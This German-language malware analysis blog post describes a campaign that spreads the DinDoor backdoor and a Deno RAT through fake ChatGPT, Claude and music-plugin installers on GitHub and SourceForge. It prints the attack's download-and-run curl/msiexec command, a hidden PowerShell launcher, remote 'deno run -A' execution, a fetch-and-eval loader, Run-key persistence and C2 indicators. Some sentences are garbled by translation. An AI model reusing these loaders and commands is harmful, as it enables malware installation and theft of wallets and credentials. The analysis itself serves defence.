Betrug, Bedrohungsinformationen

Gefälschte Software auf GitHub und SourceForge verbreitet Deno RAT 

von Gabriele Orini | 26. Mai 2026
Ein Wolf im Schafspelz

Im Rahmen unserer Aktivitäten zur Bedrohungssuche haben wir auf GitHub und SourceForge gefälschte Installationsprogramme und Plugins entdeckt, die sich als beliebte Software wie ChatGPT, Claude, AutoTune und Kontakt ausgeben und eine als „DinDoor“ bekannte Deno-Backdoor verbreiten. Die Angreifer nutzen kompromittierte YouTube , um Links zu diesen Plattformen zu verbreiten. 

DinDoor installiert letztendlich verschiedene Arten von Malware, darunter einen heimlichen Fernzugriffstrojaner (RAT), der ebenfalls die Deno-JavaScript-Laufzeitumgebung nutzt.  

Angreifer nutzen zunehmend alternative JavaScript-Laufzeitumgebungen wie Bun und Deno, um herkömmliche Erkennungsmethoden zu umgehen. In einer unserer jüngsten Untersuchungen haben wir dokumentiert, wie Angreifer Bun als ersten Infektionsvektor nutzen, um NWHStealer zu verbreiten. Und im März beobachteten ThreatDown zudem, dass Angreifer Deno einsetzten, um CastleLoader über eine mehrstufige Infektionskette zu verbreiten, bei der der ClickFix-Köder zum Einsatz kam.  

Diese Kampagnen nutzen Scoop (ein alternatives Installationsprogramm für Windows) und WinGet (den offiziellen Windows ), um Deno auf dem Computer des Opfers zu installieren. Anschließend nutzen sie die Deno-Laufzeitumgebung, um eine RAT auszuführen, die in der Lage ist, zusätzliche Payloads auszuführen und Daten aus Browsern, Wallets und anderen Anwendungen abzugreifen. Diese RAT verfügt über eine interessante Peer-to-Peer-Funktion, die Edge nutzt, Edge den schädlichen Datenverkehr Edge verschleiern. 

Seriöse Plattformen, die zur Verbreitung von Malware missbraucht werden

In den meisten der untersuchten Fälle wird die Infektionskette in der Regel überMSI-DateienoderPowerShell-Skripteausgelöst, die von GitHub oder SourceForge heruntergeladen wurden. Die Nutzer werden meist über kompromittierteYouTube auf diese bösartigen Repositorys weitergeleitet. Diese Videos verzeichnen derzeit insgesamt mehr als 50.000 Aufrufe. 

Gehackte YouTube mit KI-generierten Videos 
GehackteYouTube mit KI-generierten Videos 

Die gehackten YouTube veröffentlichen Beiträge, in denen für verschiedene Software geworben wird, und wechseln ständig zwischen GitHub-Konten, um die Malware zu verbreiten. 

YouTube , die auf die bösartigen GitHub-Repositorys verweisen
YouTube , die auf die schädlichen GitHub-Repositorys verweisen

Die gefälschte Software scheint darauf ausgelegt zu sein, Kreative, KI-Begeisterte, Gamer und technisch versierte Nutzer anzusprechen, die eher dazu neigen, inoffizielle Tools, geknackte Software oder von der Community verbreitete Installationsprogramme von Websites wie GitHub und SourceForge herunterzuladen. Wir haben gefälschte MSI-Dateien und Skripte entdeckt, die sich als Installationsprogramme und Plugins für legitime Software und Marken wie ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune und Kontakt tarnen. 

GitHub-Repository für gefälschten ChatGPT-Installer
GitHub-Repository für gefälschten ChatGPT-Installer 

Die bösartigen Repositorys enthalten jeweils einen Befehl für Windows macOS. In diesen Repositorys werden die Nutzer aufgefordert, das Terminal zu öffnen und einen bösartigen Befehl einzufügen, der die MSI-Datei von GitHub herunterlädt und ausführt. 

Ein gefälschtes Plugin, das den Benutzer auffordert, den schädlichen Befehl zu kopieren und auszuführen 
Ein gefälschtes Plugin, das den Benutzer auffordert, den schädlichen Befehl zu kopieren und auszuführen 

Böswillige GitHub-Konten erstellen zahlreiche Repositorys, die mit gefälschter Software und Plugins zu beliebten Programmen gefüllt sind, um mehr Nutzer anzulocken. 

GitHub-Konto mit verschiedenen schädlichen Repositorys
GitHub-Konto mit verschiedenen schädlichen Repositorys

Wir haben festgestellt, dass dieselbe Hintertür über SourceForge verbreitet wurde, wobei sie sich als legitime Spielesoftware namens „GearUP“ und als KI-basierte Software zum Entfernen von Wasserzeichen namens „BWR“ ausgab. 

Die auf SourceForge gehosteten schädlichen MSI-Dateien

Wie man sicher bleibt  

Die Angreifer setzten stark auf das Vertrauen der Nutzer. GitHub und SourceForge sind seriöse Plattformen, wodurch gefälschte Projekte überzeugender wirken. Wir haben GitHub kontaktiert, das die bösartigen Repositorys umgehend entfernt hat; Nutzer sollten jedoch damit rechnen, dass weiterhin neue auftauchen.

Hier sind ein paar einfache Tipps, wie Sie auf Nummer sicher gehen können:  

  • Laden Sie Software nur von den offiziellen Websites der Anbieter herunter.  
  • Seien Sie skeptisch gegenüber „kostenlosen“, geknackten oder inoffiziellen Versionen kostenpflichtiger Software. 
  • Seien Sie vorsichtig bei Downloads von GitHub, SourceForge, Foren oder Filesharing-Seiten, insbesondere von neuen oder unbekannten Konten. 
  • Angreifer erstellen weiterhin neue Profile, um diese Malware plattformübergreifend zu verbreiten. Überprüfen Sie vor dem Herunterladen eines Programms das Profil des Entwicklers oder Herausgebers, dessen Reputation und das Erstellungsdatum. 
  • Überprüfen Sie, ob der Inhalt des Archivs, die Bilder und die Textdateien Ihren Erwartungen entsprechen. Die Namen und Strukturen von Archiven folgen oft bekannten Mustern, die auf bösartige Absichten hindeuten.  
  • Überprüfen Sie den Herausgeber und die digitale Signatur der Datei, bevor Sie sie ausführen. Windows können Sie dies in der Regel tun, indem Sie mit der rechten Maustaste auf die Datei klicken und „Eigenschaften“ > „Digitale Signaturen“ auswählen. Beachten Sie, dass eine gültige Signatur keine Garantie für die Sicherheit einer Datei ist, fehlende oder verdächtige Signaturen jedoch oft ein Warnsignal darstellen. 

Technische Analyse 

Die bösartigen GitHub-Repositorys fordern den Benutzer auf, das Eingabefeld zu öffnen und einen bösartigen Befehl auszuführen. Die bösartigen Befehle laden eine MSI-Datei von GitHub herunter und installieren sie über msiexec. Diese Repositorys enthalten manchmal auch PowerShell-Skripte, um die Infektionskette auf ähnliche Weise in Gang zu setzen. 

Beispiel für einen auf GitHub gehosteten bösartigen Befehl, der die Infektionskette in Gang setzt: 

curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi 

Das MSI-Paket legt eine CMD-Datei und ein PowerShell-Skript in einem zufälligen Verzeichnis ab, das im MSI-Paket angegeben ist InstallationFolder sowie Registrierungswerte. Wir haben unterschiedliche Strukturen für diese MSIs festgestellt, wobei JavaScript anstelle der CMD-Datei verwendet wurde oder zusätzliche eingebettete Dateien vorhanden waren.

Die Dateien „Ps1File“ und „CmdFile“ im MSI-Dropper
Die Dateien „Ps1File“ und „CmdFile“ im MSI-Dropper

Die CMD-Datei führt das PowerShell-Skript aus, dessen Name sich in den analysierten Infektionsketten ändert: 

@set "SCRIPTDIR=%~dp0" @powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden" 

Das ausgeführte PowerShell-Skript
Das ausgeführte PowerShell-Skript

Das PowerShell-Skript übernimmt folgende Aufgaben: 

  • Stellen Sie sicher, dass der Paketmanager Scoop installiert ist, und installieren Sie ihn gegebenenfalls mit dem offiziellen Skript von get.scoop.sh. Scoop ist ein beliebtes Open-Source-Programm zur Installation von Software über die Befehlszeile sowie ein Paketmanager für Microsoft Windows. 
  • Verwenden Sie Scoop, um WinGet (Windows Manager) zu installieren, falls es fehlt.  
  • Installiert Deno (eine JavaScript-/TypeScript-Laufzeitumgebung) über WinGet oder Scoop, falls es noch nicht vorhanden ist.

Die Verwendung der Paketmanager Scoop und WinGet zur Installation zusätzlicher Software auf dem kompromittierten Rechner ist ein interessanter Ansatz, der dem Angreifer mehr Flexibilität verschafft. 

Befehl zur Installation von Deno mit WinGet: 

"C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent

Die DinDoor-Hintertür 

Als Nächstes wird der folgende Schritt mit der heruntergeladenen Deno-Ausführungsdatei ausgeführt: 

"C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js

Der zurückgegebene Code (interner Name: „launcher-1“) ist eine kleine Eval-Loop-Funktion, die die nächste Stufe herunterlädt (interner Name: „launcher-2“). Die heruntergeladene Backdoor ist unter dem NamenDinDoor bekannt. 

var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))}

Die Backdoor sorgt für die Persistenz, sendet Informationen über das kompromittierte System an den Command-and-Control-Server (C2) und führt zusätzliche Payloads sowie vom C2 zurückgesendete Befehle aus. Die für die C2-Kommunikation verwendeten HTTP-Endpunkte variieren je nach analysiertem Fall.  

Die Hintertür ruft eine ID von einem HTTP-Endpunkt ab (zum Beispiel, /security-pool) und nutzt diese ID dann, um die nächste Stufe von /v2{ID}.js.   

Die erhaltene Stufe wird ausgeführt über stdin ohne auf die Festplatte geschrieben zu werden, mit dem Befehl: 

deno run -A --no-check –

Um eine dauerhafte Präsenz zu gewährleisten, führt die Backdoor einen PowerShell-Befehl aus, um einen RUN-Schlüssel zu erstellen, der den zuvor verwendeten Downloader „launcher-1“ ausführt: 

conhost.exe --headless "<deno.exe>" -A "%APPDATA%\<hash>.js

In den untersuchten Fällen verbreitet diese Backdoor mehrere Malware-Familien. In diesem Blogbeitrag analysieren wir eine der verbreiteten Payloads: eine RAT, die die Deno-JavaScript-Laufzeitumgebung nutzt. 

Deno RAT 

Das gelieferte RAT nutzt, wie die anderen analysierten Skripte auch, die JavaScript-Umgebung Deno und verfügt über den vollen Funktionsumfang, um das Gerät zu steuern, Befehle und Payloads auszuführen sowie verschiedene Arten von Daten über sein integriertes Stealer-Modul zu exfiltrieren.  

Wir haben keinen konkreten Namen oder Hinweis auf den Urheber dieser RAT gefunden. In der Vergangenheit wurde die RAT aufgrund eines bestimmten Werts in der Konfiguration als „Smokest“ bezeichnet. Der ähnliche Kommentierungsstil und die gemeinsame Infrastruktur lassen vermuten, dass der Entwickler von DinDoor und der Entwickler der RAT möglicherweise dieselbe Person oder dasselbe Team sind. 

Hast du etwas mitgenommen, das du besser nicht hättest mitnehmen sollen?

Neben HTTP für die C2-Kommunikation unterstützt der RAT auch WebSocket Kommunikation, die aktiviert wird, wenn der JSON-Wert isLiveEnabled Der vom C2 zurückgegebene Wert ist auf „true“ gesetzt. 

Die Hauptfunktion von Deno RAT
Die Hauptfunktion von Deno RAT

Das RAT unterstützt verschiedene Befehle (exec, exec-ps, exec-sc, sysinfo, screenshot, stealer) und Funktionalität: 

  • Systeminformationen über das kompromittierte Gerät erfassen 
  • Vollständige bidirektionale Steuerung über eine benutzerdefinierte VNC-Implementierung via WebSocket 
  • Richten Sie sich an mehr als 50 Krypto-Wallet-Erweiterungen und 10 Krypto-Software-Ordner wie Atomic Wallet, Exodus, Electrum und ByteCoin
  • Daten von Browsern wie Chrome, Chromium, Brave, Edge, Avast Browser, Edge, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser und Chromodo erfassen 
  • Daten aus Telegram, Discord und Lightcord extrahieren 
  • Daten aus der Zwischenablage speichern und bearbeiten  
  • Ordner und Dateien auflisten und Inhalte aus Dateien mit bestimmten Dateiendungen extrahieren  
  • Screenshots mit verschiedenen Methoden erstellen  
  • Zusätzliche Payloads ausführen  
  • Beliebige Prozesse starten oder beenden  
  • Befehle mit PowerShell ausführen  
  • SOCKS5-Proxy-Tunnel über WebSocket einrichten 

Einer der interessantesten Aspekte des RAT ist ein Peer-to-Peer-Streaming-Modus, der den Edge nutzt, um den Datenverkehr zu verschleiern und die Erkennung zu erschweren.

Um Live-Videos direkt an den Angreifer zu streamen, ohne sie über den C2-Server zu leiten, startet die RAT einen versteckten Edge und verbindet sich über Chrome Protocol (CDP) mit diesem. Anschließend fügt sie eine kleine WebRTC-HTML-Seite in Edge ein und verwandelt den legitimen Browser so in einen Peer-to-Peer-Videorelay. Der Deno-Agent erfasst den Bildschirm des Opfers und codiert ihn im H.264-Format, leitet die Frames über CDP an die Edge weiter, und Edge sie über einen verschlüsselten WebRTC-DataChannel direkt an den Browser des Betreibers Edge . Die für den Aufbau der direkten Verbindung erforderlichen SDP- und ICE-Signale werden über den bestehenden C2-WebSocket ausgetauscht. 

Die in Edge eingefügte HTML-Seite
Die in Edge eingefügte HTML-Seite 

Der RAT nutzt die folgenden Endpunkte für die C2-Kommunikation, die je nach Sample variieren können: 

  • /health: überprüft die „ok“-Antwort vom C2 
  • /token: Empfang von Konfigurationsparametern, Aufgabenübermittlung, Ergebnissen und exfiltrierten Daten 
  • /vnc/agent/: Für die VNC-Kommunikation verwendeter WebSocket-Pfad 

Die Konfigurationsdaten sind Base64-kodiert und werden bei der Kommunikation mit dem C2 als Autorisierungstoken gesendet. Dekodierte Konfigurationsdaten: 

{ 

  "buildId": "cd361ef3159f5ce9", 

  "buildNote": "BWR", 

  "buildType": "msi-v2", 

  "proxyUrls": ["{C2}"], 

  "userId": "…", 

  "accessTokenHash": "…", 

  "iat": 1779372546, 

  "exp": 2094948546 

}

Wir haben verschiedene Varianten dieser RAT entdeckt, darunter eine „Light“-Version namens „agent-lite“, die nur wenige Befehle unterstützt und für die C2-Kommunikation Cloudflare Workers nutzt. 

Die „Light“-Version des RAT
Die „Light“-Version des RAT

 

Danksagungen 

Indikatoren für Kompromisse (IOCs) 

URLs 

  • https[:]//github.com/claude-free-plugin/
  • https[:]//github.com/ai-gen-profi 
  • https[:]//github.com/wharfdemolisherpit 
  • https[:]//sourceforge.net/projects/gearup/ 
  • https[:]//sourceforge.net/projects/bluewaveremover/

Domänen 

  • claudescript[.]top: Vertriebswebsite 
  • ms-telemetry-gateway-us[.]com: C2 
  • dakatawebstick[.]com: C2 
  • ashpaltlonpro[.]com: C2 
  • cf-proxy[.]cloud-analytics-services[.]workers.dev: C2 
  • agilemast3r[.]duckdns[.]org: C2 
  • geralnewlong[.]com: C2 
  • hngfbgfbfb[.]cyou: C2 
  • logicalnewrestore[.]com: C2

IPs 

  • 23[.]227[.]196[.]107: C2 
  • 45[.]137[.]99[.]121: C2 
  • 31[.]57[.]129[.]23: C2 
  • 66[.]78[.]40[.]107: C2 
  • 193[.]233[.]198[.]132: C2

Wir berichten nicht nur über Bedrohungen - wir beseitigen sie

Cybersecurity-Risiken sollten nie über eine Schlagzeile hinausgehen. Laden Sie noch heute Malwarebytes herunter, um Bedrohungen von Ihren Geräten fernzuhalten.

Über den Autor

Gabriele Orini

Gabriele ist Malware-Forschungsingenieur und liebt es, Malware zu bekämpfen. Wenn er gerade nicht damit beschäftigt ist, genießt er die Natur, Kunst und Tiere.

NEUESTE ARTIKEL

Wanzen
ClickFix imitiert Windows

Über 700 Bildungs- und Technologie-Websites im Rahmen einer groß angelegten ClickFix-Malware-Kampagne gekapert

Mai 26, 2026

Hackers eine Sicherheitslücke in einer Ghost-CMS-Website Hackers , um gefälschte Cloudflare-Verifizierungsseiten anzuzeigen, die Nutzer dazu drängen, ihre eigenen PCs zu infizieren.

Nachrichten
Woche der Sicherheit

Eine Woche im Bereich Sicherheit (Mai 18 – Mai 24)

Mai 25, 2026

Eine Liste der Themen, die wir in der Woche vom 18. bis 24. Mai 2026 behandelt haben

Wanzen
Chrome

Chrome aktualisieren: Durch kritische Sicherheitslücken könnten Angreifer Code ausführen

Mai 22, 2026

Dieses Chrome behebt kritische Sicherheitslücken, die Angreifer über bösartige Websites ausnutzen könnten, jedoch nicht die „Browser Fetch“-Sicherheitslücke.

Verwandte Artikel

Symbol für Mitwirkende

Mitwirkende

Symbol für das Bedrohungszentrum

Bedrohungszentrum

Podcasts-Symbol

Podcast

Glossar-Symbol

Glossar

Symbol für Betrug

Betrug